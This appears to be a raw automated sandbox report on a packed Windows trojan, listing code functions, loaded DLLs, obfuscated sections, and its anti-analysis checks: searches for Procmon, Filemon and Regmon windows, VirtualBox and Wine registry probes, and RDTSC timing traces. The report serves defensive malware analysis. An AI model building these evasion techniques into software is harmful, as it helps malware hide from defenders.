Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC3000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080B198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B70198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E2138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0824B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081E258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F4288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082D39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083B308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C81315
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B064D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0D429
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D4573
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081D5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DE544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F45A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C016C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008396FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F66C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082A648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C067C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00826799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080D720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0B8CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080B8A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008098B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081F8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B4883B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00804868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00820B88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00824BA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00818BD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B09BDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB4B4E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082AC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C09C6B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E1D78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5AD98
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00805DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00804DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B75D2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1BD15
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFAD0E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081AD38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080BD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F8E78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00821EE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B68ED9
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 007B4610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: lolfhxxi ZLIB complexity 0.994913422527048
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\OX1A1DLO.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 2095104 > 1048576
Source: file.exe | Static PE information: Raw size of lolfhxxi is bigger than: 0x100000 < 0x194600
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.7b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lolfhxxi:EW;swlqukzj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lolfhxxi:EW;swlqukzj:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2040e8 should be: 0x2032cf
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: lolfhxxi
Source: file.exe | Static PE information: section name: swlqukzj
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9EFB2 push edx; mov dword ptr [esp], ebp | 0_2_00A9F062
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9EFB2 push 14007003h; mov dword ptr [esp], edx | 0_2_00A9F06A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9EFB2 push 1270E709h; mov dword ptr [esp], esi | 0_2_00A9F072
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD50D8 push ecx; mov dword ptr [esp], 7EF691CEh | 0_2_00CD50FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD50D8 push 19F96B7Ch; mov dword ptr [esp], ebp | 0_2_00CD51E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], 6F8FB557h | 0_2_00BFE0AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi | 0_2_00BFE0E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], ebx | 0_2_00BFE0ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], esp | 0_2_00BFE132
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 4AAF583Ch | 0_2_00BFE194
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push 125DE493h; mov dword ptr [esp], esi | 0_2_00BFE1B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], ebx | 0_2_00BFE293
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], edx | 0_2_00BFE356
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], eax | 0_2_00BFE46F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 7EEE1290h | 0_2_00BFE473
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push 10D1BF57h; mov dword ptr [esp], eax | 0_2_00BFE50E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], ecx | 0_2_00BFE5E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push 415528C0h; mov dword ptr [esp], esi | 0_2_00BFE5F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi | 0_2_00BFE67F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], 3248D001h | 0_2_00BFE697
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push 59B54900h; mov dword ptr [esp], esp | 0_2_00BFE6A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push ebx; mov dword ptr [esp], edi | 0_2_00BFE6C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], edx | 0_2_00BFE702
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push 03E74006h; mov dword ptr [esp], edx | 0_2_00BFE714
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push ecx; mov dword ptr [esp], 07B6B7D8h | 0_2_00BFE73D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push 667103DBh; mov dword ptr [esp], ebx | 0_2_00BFE7D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 6F7F77E1h | 0_2_00BFE807
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi | 0_2_00BFE825
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], ecx | 0_2_00BFE829
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push 55723D11h; mov dword ptr [esp], ecx | 0_2_00BFE831
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], 5AF6E9C6h | 0_2_00BFE885
Source: file.exe | Static PE information: section name: lolfhxxi entropy: 7.954139609313276

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-37512
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9D9EC second address: A9D9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1114F second address: C1115F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1115F second address: C1116F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Bh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C114FF second address: C11503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C11503 second address: C1150F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC41CDAB666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1150F second address: C11514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C11514 second address: C11545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC41CDAB671h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CDAB675h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13F20 second address: A9D9EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 7964451Eh 0x0000000d jne 00007FC41CC2F0CCh 0x00000013 push dword ptr [ebp+122D1189h] 0x00000019 jmp 00007FC41CC2F0CBh 0x0000001e call dword ptr [ebp+122D3071h] 0x00000024 pushad 0x00000025 jmp 00007FC41CC2F0D0h 0x0000002a xor eax, eax 0x0000002c jmp 00007FC41CC2F0CEh 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 pushad 0x00000036 jnl 00007FC41CC2F0DBh 0x0000003c call 00007FC41CC2F0CAh 0x00000041 mov edx, dword ptr [ebp+122D3712h] 0x00000047 pop eax 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D36B2h], eax 0x0000004f jmp 00007FC41CC2F0CBh 0x00000054 mov esi, 0000003Ch 0x00000059 cld 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jmp 00007FC41CC2F0D0h 0x00000063 lodsw 0x00000065 mov dword ptr [ebp+122D18D1h], edi 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jbe 00007FC41CC2F0D8h 0x00000075 jmp 00007FC41CC2F0D2h 0x0000007a clc 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f pushad 0x00000080 sub ebx, 48E15375h 0x00000086 popad 0x00000087 nop 0x00000088 jo 00007FC41CC2F0E1h 0x0000008e push eax 0x0000008f push edx 0x00000090 push eax 0x00000091 push edx 0x00000092 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13F91 second address: C1403F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FC41CDAB668h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dx, 86A3h 0x00000028 push ecx 0x00000029 mov edx, dword ptr [ebp+122D3672h] 0x0000002f pop edx 0x00000030 push 00000000h 0x00000032 mov edi, 3742FAFAh 0x00000037 push 92B4125Fh 0x0000003c jp 00007FC41CDAB66Eh 0x00000042 add dword ptr [esp], 6D4BEE21h 0x00000049 clc 0x0000004a push 00000003h 0x0000004c mov dword ptr [ebp+122D182Ah], esi 0x00000052 push 00000000h 0x00000054 push 00000000h 0x00000056 push esi 0x00000057 call 00007FC41CDAB668h 0x0000005c pop esi 0x0000005d mov dword ptr [esp+04h], esi 0x00000061 add dword ptr [esp+04h], 00000019h 0x00000069 inc esi 0x0000006a push esi 0x0000006b ret 0x0000006c pop esi 0x0000006d ret 0x0000006e push 00000003h 0x00000070 jne 00007FC41CDAB66Ah 0x00000076 push 40EB9056h 0x0000007b pushad 0x0000007c je 00007FC41CDAB66Ch 0x00000082 js 00007FC41CDAB666h 0x00000088 jng 00007FC41CDAB66Ch 0x0000008e push eax 0x0000008f push edx 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1411D second address: C14122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14122 second address: C14128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14128 second address: C1412C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C1412C second address: C14169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D30A2h], esi 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+122D1806h], edx 0x0000001e push EB11832Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FC41CDAB674h 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14169 second address: C1416E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1416E second address: C1420C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 14EE7D55h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC41CDAB668h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dx, 8124h 0x0000002c mov di, cx 0x0000002f push 00000003h 0x00000031 call 00007FC41CDAB66Bh 0x00000036 jmp 00007FC41CDAB679h 0x0000003b pop edx 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D38B2h] 0x00000044 push 00000003h 0x00000046 sub esi, 364B837Bh 0x0000004c mov esi, dword ptr [ebp+122D38DEh] 0x00000052 call 00007FC41CDAB669h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007FC41CDAB66Ch 0x0000005f jmp 00007FC41CDAB674h 0x00000064 popad 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1420C second address: C14243 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC41CC2F0CCh 0x00000008 jnl 00007FC41CC2F0C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FC41CC2F0CCh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jnp 00007FC41CC2F0CEh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push esi 0x00000023 pushad 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C142FD second address: C14368 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007FC41CDAB66Ch 0x00000013 pushad 0x00000014 jmp 00007FC41CDAB673h 0x00000019 jmp 00007FC41CDAB66Ah 0x0000001e popad 0x0000001f popad 0x00000020 nop 0x00000021 sub dword ptr [ebp+122D31CEh], edi 0x00000027 movsx edx, dx 0x0000002a push 00000000h 0x0000002c mov dh, cl 0x0000002e sub dword ptr [ebp+122D31CEh], ebx 0x00000034 push A43714A7h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC41CDAB677h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14368 second address: C143D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC41CC2F0C6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 5BC8EBD9h 0x00000015 jmp 00007FC41CC2F0CBh 0x0000001a mov dx, D77Bh 0x0000001e push 00000003h 0x00000020 mov ecx, 22D54512h 0x00000025 push 00000000h 0x00000027 jmp 00007FC41CC2F0D7h 0x0000002c mov cx, 34ADh 0x00000030 push 00000003h 0x00000032 call 00007FC41CC2F0D6h 0x00000037 mov edx, 5882B46Ah 0x0000003c pop ecx 0x0000003d push FF4C4FC9h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C143D9 second address: C143DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C143DF second address: C14452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3F4C4FC9h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC41CC2F0C8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+12449E6Bh] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FC41CC2F0C8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FC41CC2F0CBh 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pushad 0x00000055 popad 0x00000056 pop esi 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14452 second address: C1446E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CDAB678h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BFA6D0 second address: BFA6D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C324CB second address: C324EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3280A second address: C32840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D6h 0x00000007 jmp 00007FC41CC2F0D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32840 second address: C32859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CDAB675h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32859 second address: C32882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0CAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32882 second address: C32886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32886 second address: C32892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32892 second address: C328A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FC41CDAB66Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32A29 second address: C32A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32A2D second address: C32A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32A33 second address: C32A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC41CC2F0CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32A41 second address: C32A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
